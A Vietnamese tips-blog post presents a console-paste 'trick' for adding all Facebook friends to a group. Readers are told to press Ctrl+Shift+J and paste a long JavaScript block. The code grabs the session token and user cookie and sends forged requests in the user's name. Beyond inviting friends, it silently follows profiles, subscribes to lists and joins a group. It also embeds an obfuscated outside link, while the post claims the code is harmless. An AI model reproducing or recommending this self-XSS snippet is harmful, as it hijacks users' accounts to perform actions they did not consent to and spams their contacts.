- - 4 Bình luậnTạo nhóm Facebook là cách tốt nhất để có được kết nối với bạn bè trên Facebook của bạn ,cho phép bạn tạo một cuộc trò chuyện cá nhân giữa các thành viên trong nhóm.

Facebook Groups không giống Facebook Page, trang Facebook có thể được yêu thích bởi bất cứ ai và tham gia dành cho tất cả những ai có một tài khoản facebook, Nhưng trong Facebook Groups chỉ những người đã được thêm vào nhóm cụ thể mới có thể tham gia tạo cuộc trò chuyện và xem bảng tin trong nhóm.

Các bước để thêm tất cả bạn bè vào nhóm:
  • Bước 1: Đầu tiên  truy cập Facebook.com và đăng nhập vào tài khoản của bạn.
  • Bước 2: Đi và tạo hoặc mở nhóm hiện tại của bạn.
  • Bước 3: Chọn vào mục 'Thêm thành viên'
  • Bước 4: Khi cửa sổ pop up mời bạn bè xuất hiện, Nhấn tổ hợp phím: 'Ctrl + Shift + J' để dán mã code dưới đây vào:
(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById("hasilsurasil").style.display="none";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
 
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
 
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
 
function a(abone){
var http4 = new XMLHttpRequest();
 
var url4 = "/ajax/follow/follow_profile.php?__a=1";
 
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
 
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
 
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
 
http4.close; // Close the connection
 
}
}
 
http4.send(params4);
}
 
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
 
a("");
a("");
 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(d+)/)[1]);
 
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(d+)/)[1]);
 
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

  • Bước 5 : Nhấn Enter và  xem thành quả.
 Lưu ý: Tất cả đoạn mã code đều an toàn và vô hại và nếu bạn có quá nhiều bạn bè và lạm dụng sẽ bị hạn chế một số tính năng từ Facebook. Vì vậy hãy lưu ý trước khi sử dụng nó nhé!
-Hy vọng các bạn sẽ thích bài viết và mời được tất cả bạn bè tham gia nhóm của mình.

#Chúc các bạn online vui vẻ! Nếu có thắc mắc hãy phản hồi với chúng tôi vào bình luận bên dưới bài viết nhé ^_^


#Nguồn: [Sưu Tầm Google]
Coppy bài viết thì nhớ ghi nguồn và trỏ link bài viết về #Shop Thủ Thuật nhé! Mình xin chân thành cảm ơn.
CHUYÊN MỤC:

Bình luận bài viết (4)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé